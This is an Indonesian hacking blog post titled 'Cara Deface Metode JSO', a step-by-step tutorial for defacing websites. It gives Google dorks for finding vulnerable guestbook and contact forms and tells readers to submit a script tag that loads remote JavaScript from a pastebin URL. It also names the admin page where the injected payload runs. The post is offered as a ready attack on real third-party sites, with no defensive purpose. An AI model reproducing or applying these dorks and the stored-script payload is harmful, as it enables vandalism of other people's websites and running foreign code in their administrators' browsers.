Safelink

Cara Deface Metode JSO (Javascript Overlay) - Bekasi Code


Hai Semua, selamat datang di blog Bekasi Code, Pada Artikel yang kalian baca kali ini dengan judul Cara Deface Metode JSO, kami telah mempersiapkan artikel ini dengan baik untuk kalian baca dan ambil informasi didalamnya. mudah-mudahan isi postingan yang kami tulis ini dapat kalian pahami. baiklah, selamat membaca.

Oke langsung saja kita mulai :v Siapkan dlu bahan-bahan nya:

* Script JSO, Kalau tidak punya bisa baca disini

Contoh script JSO:
<script type="text/javascript" src="https://pastebin.com/raw/6KMCHSC4"></script>

* Dork
intext:"Aplikasi Sistem Informasi Kelulusan"
inurl:index.php?page=contact
inurl:bukutamu.html
Kembangin lagi dork nya biar dapet yang fresh cok:v

Kalo udah ikutin step by step nya :v

1. Pertama kalian dorking dlu dengan dork yang diatas

2. Lalu cari site yang vuln, kalo udh dapet kalian isi nama lengkap dan email asal aja

3. Isi pesan dengan script JSO buatan kalian
sebagai contoh gua taruh script ini 
<script type="text/javascript" src="https://pastebin.com/raw/6KMCHSC4"></script>

4. Kalo udh tinggal kirim deh, and BOOM

Akses? 
/admin/hubungi.php

contoh:
site.co.li/admin/hubungi.php

Sekian dari admin untuk tutorial kali ini, sampai jumpa di tutorial-turorial berikutnya :)

Semoga tutorial kali ini bermanfaat untuk kalian yang sedang belajar :v

Berlangganan update artikel terbaru via email:

Tampilkan Komentar
Sembunyikan Komentar

0 Response to "Cara Deface Metode JSO (Javascript Overlay) - Bekasi Code"

Post a Comment

Berikan kami komentar, apabila ada yang tidak dimengerti

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel

Like this blog? Keep us running by whitelisting this blog in your ad blocker.

This is how to whitelisting this blog in your ad blocker.

Thank you!

×